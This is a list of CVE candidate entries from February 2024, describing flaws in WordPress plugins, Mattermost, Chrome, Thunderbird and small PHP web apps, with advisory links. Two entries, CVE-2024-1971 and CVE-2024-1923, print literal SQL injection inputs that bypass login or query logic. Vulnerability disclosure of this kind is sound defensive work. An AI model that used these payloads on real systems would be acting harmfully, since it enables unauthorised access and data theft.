URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/8a6ca886-de4c-4d45-a934-3e90378e7eb3?source=cve Assigned (20240228)
CVE 2024 1983 Candidate The Simple Ajax Chat WordPress plugin before 20240223 does not prevent visitors from using malicious Names when using the chat, which will be reflected unsanitized to other users. MISC:https://wpscan.com/vulnerability/bf3a31de-a227-4db1-bd18-ce6a78dc96fb/ | URL:https://wpscan.com/vulnerability/bf3a31de-a227-4db1-bd18-ce6a78dc96fb/ Assigned (20240228)
CVE 2024 1982 Candidate The Migration, Backup, Staging – WPvivid plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the get_restore_progress() and restore() functions in all versions up to, and including, 0.9.68. This makes it possible for unauthenticated attackers to exploit a SQL injection vulnerability or trigger a DoS. MISC:https://plugins.trac.wordpress.org/changeset?old_path=%2Fwpvivid-backuprestore%2Ftrunk&old=2667839&new_path=%2Fwpvivid-backuprestore%2Ftrunk&new=2667839 | URL:https://plugins.trac.wordpress.org/changeset?old_path=%2Fwpvivid-backuprestore%2Ftrunk&old=2667839&new_path=%2Fwpvivid-backuprestore%2Ftrunk&new=2667839 | MISC:https://research.hisolutions.com/2024/01/multiple-vulnerabilities-in-wordpress-plugin-wpvivid-backup-and-migration/ | URL:https://research.hisolutions.com/2024/01/multiple-vulnerabilities-in-wordpress-plugin-wpvivid-backup-and-migration/ | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/4f17976e-d6b9-40fb-b2fb-d60bcfd68d12?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/4f17976e-d6b9-40fb-b2fb-d60bcfd68d12?source=cve Assigned (20240228)
CVE 2024 1981 Candidate The Migration, Backup, Staging – WPvivid plugin for WordPress is vulnerable to SQL Injection via the 'table_prefix' parameter in version 0.9.68 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. MISC:https://plugins.trac.wordpress.org/changeset?old_path=%2Fwpvivid-backuprestore%2Ftrunk&old=2667839&new_path=%2Fwpvivid-backuprestore%2Ftrunk&new=2667839 | URL:https://plugins.trac.wordpress.org/changeset?old_path=%2Fwpvivid-backuprestore%2Ftrunk&old=2667839&new_path=%2Fwpvivid-backuprestore%2Ftrunk&new=2667839 | MISC:https://research.hisolutions.com/2024/01/multiple-vulnerabilities-in-wordpress-plugin-wpvivid-backup-and-migration/ | URL:https://research.hisolutions.com/2024/01/multiple-vulnerabilities-in-wordpress-plugin-wpvivid-backup-and-migration/ | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/ef8bfb38-4f20-4f9f-bb30-a88f3be2d2d3?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/ef8bfb38-4f20-4f9f-bb30-a88f3be2d2d3?source=cve Assigned (20240228)
CVE 2024 1979 Candidate A vulnerability was found in Quarkus. In certain conditions related to the CI process, git credentials could be inadvertently published, which could put the git repository at risk. MISC:RHBZ#2266690 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2266690 | MISC:https://access.redhat.com/security/cve/CVE-2024-1979 | URL:https://access.redhat.com/security/cve/CVE-2024-1979 | MISC:https://github.com/quarkusio/quarkus/issues/38055 | URL:https://github.com/quarkusio/quarkus/issues/38055 Assigned (20240228)
CVE 2024 1978 Candidate The Friends plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.8.5 via the discover_available_feeds function. This makes it possible for authenticated attackers, with administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. MISC:https://github.com/akirk/friends/pull/290 | URL:https://github.com/akirk/friends/pull/290 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3036987%40friends&new=3036987%40friends&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3036987%40friends&new=3036987%40friends&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/72e1fbce-86ae-4518-a613-7c322193acf4?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/72e1fbce-86ae-4518-a613-7c322193acf4?source=cve Assigned (20240228)
CVE 2024 1977 Candidate The Restaurant Solutions – Checklist plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Checklist points in version 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. MISC:https://www.wizlynxgroup.com/security-research-advisories/vuln/WLX-2022-004 | URL:https://www.wizlynxgroup.com/security-research-advisories/vuln/WLX-2022-004 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/8dca7f2e-f572-468a-8342-a6e096441561?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/8dca7f2e-f572-468a-8342-a6e096441561?source=cve Assigned (20240228)
CVE 2024 1976 Candidate The Marketing Optimizer plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 20200925. This is due to missing or incorrect nonce validation via the admin/main-settings-page.php file. This makes it possible for unauthenticated attackers to update the plugin's settings and inject malicious JavaScript via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/browser/marketing-optimizer/trunk/admin/main-settings-page.php | URL:https://plugins.trac.wordpress.org/browser/marketing-optimizer/trunk/admin/main-settings-page.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/b537637b-32c0-405e-94fa-c7c2d0c80658?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/b537637b-32c0-405e-94fa-c7c2d0c80658?source=cve Assigned (20240228)
CVE 2024 1973 Candidate By leveraging the vulnerability, lower-privileged users of Content Manager can manipulate Content Manager clients to elevate privileges and perform unauthorized operations. MISC:https://portal.microfocus.com/s/article/KM000027861 | URL:https://portal.microfocus.com/s/article/KM000027861 Assigned (20240228)
CVE 2024 1972 Candidate A vulnerability was found in SourceCodester Online Job Portal 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /Employer/EditProfile.php. The manipulation of the argument Address leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-255128. MISC:VDB-255128 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.255128 | MISC:VDB-255128 | SourceCodester Online Job Portal EditProfile.php cross site scripting | URL:https://vuldb.com/?id.255128 | MISC:https://prnt.sc/gtk7Fj43Qwy9 | URL:https://prnt.sc/gtk7Fj43Qwy9 Assigned (20240228)
CVE 2024 1971 Candidate A vulnerability has been found in Surya2Developer Online Shopping System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file login.php of the component POST Parameter Handler. The manipulation of the argument password with the input nochizplz'+or+1%3d1+limit+1%23 leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-255127. MISC:VDB-255127 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.255127 | MISC:VDB-255127 | Surya2Developer Online Shopping System POST Parameter login.php sql injection | URL:https://vuldb.com/?id.255127 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/Surya2Developer%20Online_shopping_-system/SQL%20Injection%20Auth.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/Surya2Developer%20Online_shopping_-system/SQL%20Injection%20Auth.md Assigned (20240228)
CVE 2024 1970 Candidate A vulnerability, which was classified as problematic, was found in SourceCodester Online Learning System V2 1.0. Affected is an unknown function of the file /index.php. The manipulation of the argument page leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-255126 is the identifier assigned to this vulnerability. MISC:VDB-255126 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.255126 | MISC:VDB-255126 | SourceCodester Online Learning System V2 index.php cross site scripting | URL:https://vuldb.com/?id.255126 | MISC:https://github.com/xiahao90/CVEproject/blob/main/xiahao.webray.com.cn/OnlineLearningSystemV2-XSS.md | URL:https://github.com/xiahao90/CVEproject/blob/main/xiahao.webray.com.cn/OnlineLearningSystemV2-XSS.md Assigned (20240228)
CVE 2024 1965 Candidate Server-Side Request Forgery vulnerability in Haivision's Aviwest Manager and Aviwest Steamhub. This vulnerability could allow an attacker to enumerate internal network configuration without the need for credentials. An attacker could compromise an internal server and retrieve requests sent by other users. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/server-side-request-forgery-vulnerability-haivision-products | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/server-side-request-forgery-vulnerability-haivision-products Assigned (20240228)
CVE 2024 1962 Candidate The CM Download Manager WordPress plugin before 2.9.1 does not have CSRF checks in some places, which could allow attackers to make logged in admins edit downloads via a CSRF attack MISC:https://wpscan.com/vulnerability/469486d4-7677-4d66-83c0-a6b9ac7c503b/ | URL:https://wpscan.com/vulnerability/469486d4-7677-4d66-83c0-a6b9ac7c503b/ Assigned (20240227)
CVE 2024 1954 Candidate The Oliver POS – A WooCommerce Point of Sale (POS) plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.4.1.8. This is due to missing or incorrect nonce validation in the includes/class-pos-bridge-install.php file. This makes it possible for unauthenticated attackers to perform several unauthorized actions like deactivating the plugin, disconnecting the subscription, syncing the status and more via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3035108%40oliver-pos&new=3035108%40oliver-pos&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3035108%40oliver-pos&new=3035108%40oliver-pos&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/88d16ce2-a1cf-4402-b140-3cab17f8c638?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/88d16ce2-a1cf-4402-b140-3cab17f8c638?source=cve Assigned (20240227)
CVE 2024 1953 Candidate Mattermost versions 8.1.x before 8.1.9, 9.2.x before 9.2.5, 9.3.0, and 9.4.x before 9.4.2 fail to limit the number of role names requested from the API, allowing an authenticated attacker to cause the server to run out of memory and crash by issuing an unusually large HTTP request. MISC:https://mattermost.com/security-updates | URL:https://mattermost.com/security-updates Assigned (20240227)
CVE 2024 1952 Candidate Mattermost version 8.1.x before 8.1.9 fails to sanitize data associated with permalinks when a plugin updates an ephemeral post, allowing an authenticated attacker who can control the ephemeral post update to access individual posts' contents in channels they are not a member of. MISC:https://mattermost.com/security-updates | URL:https://mattermost.com/security-updates Assigned (20240227)
CVE 2024 1951 Candidate The Logo Showcase Ultimate – Logo Carousel, Logo Slider & Logo Grid plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.3.8 via deserialization via shortcode of untrusted input. This makes it possible for authenticated attackers, with contributor access and above, to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. MISC:https://plugins.trac.wordpress.org/browser/logo-showcase-ultimate/tags/1.3.8/classes/lcg-adl-metabox.php | URL:https://plugins.trac.wordpress.org/browser/logo-showcase-ultimate/tags/1.3.8/classes/lcg-adl-metabox.php | MISC:https://plugins.trac.wordpress.org/browser/logo-showcase-ultimate/tags/1.3.8/classes/lcg-shortcode.php | URL:https://plugins.trac.wordpress.org/browser/logo-showcase-ultimate/tags/1.3.8/classes/lcg-shortcode.php | MISC:https://plugins.trac.wordpress.org/changeset?old_path=/logo-showcase-ultimate/tags/1.3.8&old=3045923&new_path=/logo-showcase-ultimate/tags/1.3.9&new=3045923&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?old_path=/logo-showcase-ultimate/tags/1.3.8&old=3045923&new_path=/logo-showcase-ultimate/tags/1.3.9&new=3045923&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/a63b2091-1502-4d9f-98c4-ce9d2f923dc4?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/a63b2091-1502-4d9f-98c4-ce9d2f923dc4?source=cve Assigned (20240227)
CVE 2024 1950 Candidate The Product Carousel Slider & Grid Ultimate for WooCommerce plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.9.7 via deserialization of untrusted input via shortcode. This makes it possible for authenticated attackers, with contributor access and above, to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. MISC:https://plugins.trac.wordpress.org/browser/woo-product-carousel-slider-and-grid-ultimate/tags/1.9.7/includes/classes/class-meta-box.php | URL:https://plugins.trac.wordpress.org/browser/woo-product-carousel-slider-and-grid-ultimate/tags/1.9.7/includes/classes/class-meta-box.php | MISC:https://plugins.trac.wordpress.org/browser/woo-product-carousel-slider-and-grid-ultimate/tags/1.9.7/includes/classes/class-shortcode.php | URL:https://plugins.trac.wordpress.org/browser/woo-product-carousel-slider-and-grid-ultimate/tags/1.9.7/includes/classes/class-shortcode.php | MISC:https://plugins.trac.wordpress.org/changeset?old_path=/woo-product-carousel-slider-and-grid-ultimate/tags/1.9.7&old=3045923&new_path=/woo-product-carousel-slider-and-grid-ultimate/tags/1.9.8&new=3045923&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?old_path=/woo-product-carousel-slider-and-grid-ultimate/tags/1.9.7&old=3045923&new_path=/woo-product-carousel-slider-and-grid-ultimate/tags/1.9.8&new=3045923&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/ed8636bf-229a-42a5-a19c-332679613dd2?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/ed8636bf-229a-42a5-a19c-332679613dd2?source=cve Assigned (20240227)
CVE 2024 1949 Candidate A race condition in Mattermost versions 8.1.x before 8.1.9, and 9.4.x before 9.4.2 allows an authenticated attacker to gain unauthorized access to individual posts' contents via carefully timed post creation while another user deletes posts. MISC:https://mattermost.com/security-updates | URL:https://mattermost.com/security-updates Assigned (20240227)
CVE 2024 1943 Candidate The Yuki theme for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including 1.3.14. This is due to missing or incorrect nonce validation on the reset_customizer_options() function. This makes it possible for unauthenticated attackers to reset the themes settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. MISC:https://themes.trac.wordpress.org/changeset/218603/yuki/1.3.15/inc/extensions/class-reset-extension.php | URL:https://themes.trac.wordpress.org/changeset/218603/yuki/1.3.15/inc/extensions/class-reset-extension.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/dfb760fb-f281-4649-9bd3-92f8e281f07e?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/dfb760fb-f281-4649-9bd3-92f8e281f07e?source=cve Assigned (20240227)
CVE 2024 1942 Candidate Mattermost versions 8.1.x before 8.1.9, 9.2.x before 9.2.5, and 9.3.0 fail to sanitize the metadata on posts containing permalinks under specific conditions, which allows an authenticated attacker to access the contents of individual posts in channels they are not a member of. MISC:https://mattermost.com/security-updates | URL:https://mattermost.com/security-updates Assigned (20240227)
CVE 2024 1941 Candidate Delta Electronics CNCSoft-B versions 1.0.0.4 and prior are vulnerable to a stack-based buffer overflow, which may allow an attacker to execute arbitrary code. MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-060-01 | URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-060-01 Assigned (20240227)
CVE 2024 1939 Candidate Type Confusion in V8 in Google Chrome prior to 122.0.6261.94 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) FEDORA:FEDORA-2024-129d8ca6fc | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YTGM2WHYSZAUUPENB7YO6E5ONAKE6AKJ/ | FEDORA:FEDORA-2024-449696cdb8 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/L6KJCEJWJR5Z54Z75LRJGELDNMFDKLZG/ | FEDORA:FEDORA-2024-9ce64d8940 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FGWSP5MIK7CDWJQHN2SJJX2YGSSS7E4O/ | MISC:https://chromereleases.googleblog.com/2024/02/stable-channel-update-for-desktop_27.html | URL:https://chromereleases.googleblog.com/2024/02/stable-channel-update-for-desktop_27.html | MISC:https://issues.chromium.org/issues/323694592 | URL:https://issues.chromium.org/issues/323694592 Assigned (20240227)
CVE 2024 1938 Candidate Type Confusion in V8 in Google Chrome prior to 122.0.6261.94 allowed a remote attacker to potentially exploit object corruption via a crafted HTML page. (Chromium security severity: High) FEDORA:FEDORA-2024-129d8ca6fc | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YTGM2WHYSZAUUPENB7YO6E5ONAKE6AKJ/ | FEDORA:FEDORA-2024-449696cdb8 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/L6KJCEJWJR5Z54Z75LRJGELDNMFDKLZG/ | FEDORA:FEDORA-2024-9ce64d8940 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FGWSP5MIK7CDWJQHN2SJJX2YGSSS7E4O/ | MISC:https://chromereleases.googleblog.com/2024/02/stable-channel-update-for-desktop_27.html | URL:https://chromereleases.googleblog.com/2024/02/stable-channel-update-for-desktop_27.html | MISC:https://issues.chromium.org/issues/324596281 | URL:https://issues.chromium.org/issues/324596281 Assigned (20240227)
CVE 2024 1936 Candidate The encrypted subject of an email message could be incorrectly and permanently assigned to an arbitrary other email message in Thunderbird's local cache. Consequently, when replying to the contaminated email message, the user might accidentally leak the confidential subject to a third party. While this update fixes the bug and avoids future message contamination, it does not automatically repair existing contaminations. Users are advised to use the repair folder functionality, which is available from the context menu of email folders, which will erase incorrect subject assignments. This vulnerability affects Thunderbird < 115.8.1. MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1860977 | URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1860977 | MISC:https://www.mozilla.org/security/advisories/mfsa2024-11/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-11/ | MLIST:[debian-lts-announce] 20240323 [SECURITY] [DLA 3769-1] thunderbird security update | URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00022.html Assigned (20240227)
CVE 2024 1935 Candidate The Giveaways and Contests by RafflePress – Get More Website Traffic, Email Subscribers, and Social Followers plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘parent_url’ parameter in all versions up to, and including, 1.12.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/rafflepress/tags/1.12.5/resources/views/rafflepress-giveaway.php | URL:https://plugins.trac.wordpress.org/browser/rafflepress/tags/1.12.5/resources/views/rafflepress-giveaway.php | MISC:https://plugins.trac.wordpress.org/changeset?old_path=/rafflepress/tags/1.12.5&old=3043286&new_path=/rafflepress/tags/1.12.7&new=3043286&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?old_path=/rafflepress/tags/1.12.5&old=3043286&new_path=/rafflepress/tags/1.12.7&new=3043286&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/29b471ac-3a08-42da-9907-670c3b3bae92?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/29b471ac-3a08-42da-9907-670c3b3bae92?source=cve Assigned (20240227)
CVE 2024 1933 Candidate Insecure UNIX Symbolic Link (Symlink) Following in TeamViewer Remote Client prior Version 15.52 for macOS allows an attacker with unprivileged access, to potentially elevate privileges or conduct a denial-of-service-attack by overwriting the symlink. MISC:https://www.teamviewer.com/de/resources/trust-center/security-bulletins/tv-2024-1002/ | URL:https://www.teamviewer.com/de/resources/trust-center/security-bulletins/tv-2024-1002/ Assigned (20240227)
CVE 2024 1932 Candidate Unrestricted Upload of File with Dangerous Type in freescout-helpdesk/freescout MISC:https://huntr.com/bounties/fefd711e-3bf0-4884-9acc-167649c1f9a2 | URL:https://huntr.com/bounties/fefd711e-3bf0-4884-9acc-167649c1f9a2 Assigned (20240227)
CVE 2024 1931 Candidate NLnet Labs Unbound version 1.18.0 up to and including version 1.19.1 contain a vulnerability that can cause denial of service by a certain code path that can lead to an infinite loop. Unbound 1.18.0 introduced a feature that removes EDE records from responses with size higher than the client's advertised buffer size. Before removing all the EDE records however, it would try to see if trimming the extra text fields on those records would result in an acceptable size while still retaining the EDE codes. Due to an unchecked condition, the code that trims the text of the EDE records could loop indefinitely. This happens when Unbound would reply with attached EDE information on a positive reply and the client's buffer size is smaller than the needed space to include EDE records. The vulnerability can only be triggered when the 'ede: yes' option is used; non default configuration. From version 1.19.2 on, the code is fixed to avoid looping indefinitely. MISC:https://www.nlnetlabs.nl/downloads/unbound/CVE-2024-1931.txt | URL:https://www.nlnetlabs.nl/downloads/unbound/CVE-2024-1931.txt Assigned (20240227)
CVE 2024 1928 Candidate A vulnerability, which was classified as critical, has been found in SourceCodester Web-Based Student Clearance System 1.0. Affected by this issue is some unknown functionality of the file /admin/edit-admin.php of the component Edit User Profile Page. The manipulation of the argument Fullname leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-254864. MISC:VDB-254864 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.254864 | MISC:VDB-254864 | SourceCodester Web-Based Student Clearance System Edit User Profile Page edit-admin.php sql injection | URL:https://vuldb.com/?id.254864 | MISC:https://github.com/xiahao90/CVEproject/blob/main/xiahao.webray.com.cn/Web-Based%20Student%20Clearance%20System%20-%20XSS.md | URL:https://github.com/xiahao90/CVEproject/blob/main/xiahao.webray.com.cn/Web-Based%20Student%20Clearance%20System%20-%20XSS.md Assigned (20240227)
CVE 2024 1927 Candidate A vulnerability classified as critical was found in SourceCodester Web-Based Student Clearance System 1.0. Affected by this vulnerability is an unknown functionality of the file /Admin/login.php. The manipulation of the argument txtpassword leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-254863. MISC:VDB-254863 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.254863 | MISC:VDB-254863 | SourceCodester Web-Based Student Clearance System login.php sql injection | URL:https://vuldb.com/?id.254863 | MISC:https://github.com/xiahao90/CVEproject/blob/main/xiahao.webray.com.cn/Web-Based%20Student%20Clearance%20System%20-%20SQLi.md | URL:https://github.com/xiahao90/CVEproject/blob/main/xiahao.webray.com.cn/Web-Based%20Student%20Clearance%20System%20-%20SQLi.md Assigned (20240227)
CVE 2024 1926 Candidate A vulnerability was found in SourceCodester Free and Open Source Inventory Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /app/ajax/search_sales_report.php. The manipulation of the argument customer leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-254861 was assigned to this vulnerability. MISC:VDB-254861 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.254861 | MISC:VDB-254861 | SourceCodester Free and Open Source Inventory Management System search_sales_report.php sql injection | URL:https://vuldb.com/?id.254861 | MISC:https://github.com/xiahao90/CVEproject/blob/main/xiahao.webray.com.cn/Free%20and%20Open%20Source%20inventory%20management%20system-SQLi.md | URL:https://github.com/xiahao90/CVEproject/blob/main/xiahao.webray.com.cn/Free%20and%20Open%20Source%20inventory%20management%20system-SQLi.md Assigned (20240227)
CVE 2024 1925 Candidate A vulnerability was found in Ctcms 2.1.2. It has been declared as critical. This vulnerability affects unknown code of the file ctcms/apps/controllers/admin/Upsys.php. The manipulation leads to unrestricted upload. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-254860. MISC:VDB-254860 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.254860 | MISC:VDB-254860 | Ctcms Upsys.php unrestricted upload | URL:https://vuldb.com/?id.254860 | MISC:https://docs.qq.com/doc/DQkVmRXBlbGNPZmlL | URL:https://docs.qq.com/doc/DQkVmRXBlbGNPZmlL Assigned (20240227)
CVE 2024 1924 Candidate A vulnerability was found in CodeAstro Membership Management System 1.0. It has been classified as critical. This affects an unknown part of the file /get_membership_amount.php. The manipulation of the argument membershipTypeId leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-254859. MISC:VDB-254859 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.254859 | MISC:VDB-254859 | CodeAstro Membership Management System get_membership_amount.php sql injection | URL:https://vuldb.com/?id.254859 | MISC:https://github.com/1testnew/CVE_Hunter/blob/main/SQLi-1.md | URL:https://github.com/1testnew/CVE_Hunter/blob/main/SQLi-1.md Assigned (20240227)
CVE 2024 1923 Candidate A vulnerability was found in SourceCodester Simple Student Attendance System 1.0 and classified as critical. Affected by this issue is the function delete_class/delete_student of the file /ajax-api.php of the component List of Classes Page. The manipulation of the argument id with the input 1337'+or+1=1;--+ leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-254858 is the identifier assigned to this vulnerability. MISC:VDB-254858 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.254858 | MISC:VDB-254858 | SourceCodester Simple Student Attendance System List of Classes Page ajax-api.php delete_student sql injection | URL:https://vuldb.com/?id.254858 | MISC:https://github.com/smurf-reigz/security/blob/main/proof-of-concepts/SOURCECODESTER%20%5BSimple%20Student%20Attendance%20System%20using%20PHP%20and%20MySQL%5D%20SQLi%20on%20ajax-api.php%3Faction=delete_class.md | URL:https://github.com/smurf-reigz/security/blob/main/proof-of-concepts/SOURCECODESTER%20%5BSimple%20Student%20Attendance%20System%20using%20PHP%20and%20MySQL%5D%20SQLi%20on%20ajax-api.php%3Faction=delete_class.md Assigned (20240227)
CVE 2024 1922 Candidate A vulnerability has been found in SourceCodester Online Job Portal 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /Employer/ManageJob.php of the component Manage Job Page. The manipulation of the argument Qualification/Description leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-254857 was assigned to this vulnerability. MISC:VDB-254857 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.254857 | MISC:VDB-254857 | SourceCodester Online Job Portal Manage Job Page ManageJob.php cross site scripting | URL:https://vuldb.com/?id.254857 | MISC:https://prnt.sc/WD3nof5FsEBv | URL:https://prnt.sc/WD3nof5FsEBv | MISC:https://prnt.sc/zw3SnPnfpKGu | URL:https://prnt.sc/zw3SnPnfpKGu Assigned (20240227)
CVE 2024 1921 Candidate A vulnerability, which was classified as critical, was found in osuuu LightPicture up to 1.2.2. Affected is an unknown function of the file /app/controller/Setup.php. The manipulation leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-254856. MISC:VDB-254856 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.254856 | MISC:VDB-254856 | osuuu LightPicture Setup.php unrestricted upload | URL:https://vuldb.com/?id.254856 | MISC:https://note.zhaoj.in/share/FeCRflSHPLbj | URL:https://note.zhaoj.in/share/FeCRflSHPLbj Assigned (20240227)
CVE 2024 1920 Candidate A vulnerability, which was classified as critical, has been found in osuuu LightPicture up to 1.2.2. This issue affects the function handle of the file /app/middleware/TokenVerify.php. The manipulation leads to use of hard-coded cryptographic key . The attack may be initiated remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-254855. MISC:VDB-254855 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.254855 | MISC:VDB-254855 | osuuu LightPicture TokenVerify.php handle hard-coded key | URL:https://vuldb.com/?id.254855 | MISC:https://note.zhaoj.in/share/gKyCbSSdJ5fY | URL:https://note.zhaoj.in/share/gKyCbSSdJ5fY Assigned (20240227)
CVE 2024 1919 Candidate A vulnerability classified as problematic was found in SourceCodester Online Job Portal 1.0. This vulnerability affects unknown code of the file /Employer/ManageWalkin.php of the component Manage Walkin Page. The manipulation of the argument Job Title leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-254854 is the identifier assigned to this vulnerability. MISC:VDB-254854 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.254854 | MISC:VDB-254854 | SourceCodester Online Job Portal Manage Walkin Page ManageWalkin.php cross site scripting | URL:https://vuldb.com/?id.254854 | MISC:https://prnt.sc/1W0g0F8vv2mw | URL:https://prnt.sc/1W0g0F8vv2mw Assigned (20240227)
